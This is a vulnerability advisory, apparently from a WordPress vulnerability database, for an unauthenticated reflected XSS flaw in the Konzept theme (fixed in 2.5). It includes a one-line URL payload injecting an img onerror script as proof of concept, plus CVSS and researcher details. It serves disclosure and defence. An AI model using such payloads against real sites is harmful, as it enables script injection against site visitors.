Themes Vulnerabilities

Konzept < 2.5 - Unauthenticated Reflected XSS

Description

An Unauthenticated Reflected XSS vulnerability was discovered in the Konzept theme through 2.3 for WordPress.

Proof of Concept

/?s=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%60XSS%60)%3B%3E

Affects Themes

konzept
Fixed in 2.5

References

URL
https://themeforest.net/item/konzept-fullscreen-portfolio-wordpress-theme/2383907

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Vlad Vector
Submitter
VLΛD VΞCTOR
Submitter website
https://vladvector.ru
Submitter twitter
vlad_vector
Verified
Yes
WPVDB ID
ef4dc66a-6b66-449a-97c0-20738b0aafd7

Timeline

Publicly Published
2020-08-06 (about 3 years ago)
Added
2020-08-06 (about 3 years ago)
Last Updated
2020-08-08 (about 3 years ago)

Other

Published
Title
Published
2023-02-14
Title
Quick Event Manager < 9.6.5 - Admin+ Stored XSS
Published
2021-08-02
Title
VDZ Google Analytics or Google Tag Manager / GTM < 1.4.9 - Authenticated Stored XSS
Published
2023-05-31
Title
WordPress Social Login <= 3.0.4 - Admin+ Stored XSS
Published
2018-09-30
Title
PDF & Print <= 2.0.2 - Unauthenticated Cross-Site-Scripting (XSS)
Published
2023-01-30
Title
EmbedStories < 0.7.5 - Contributor+ Stored XSS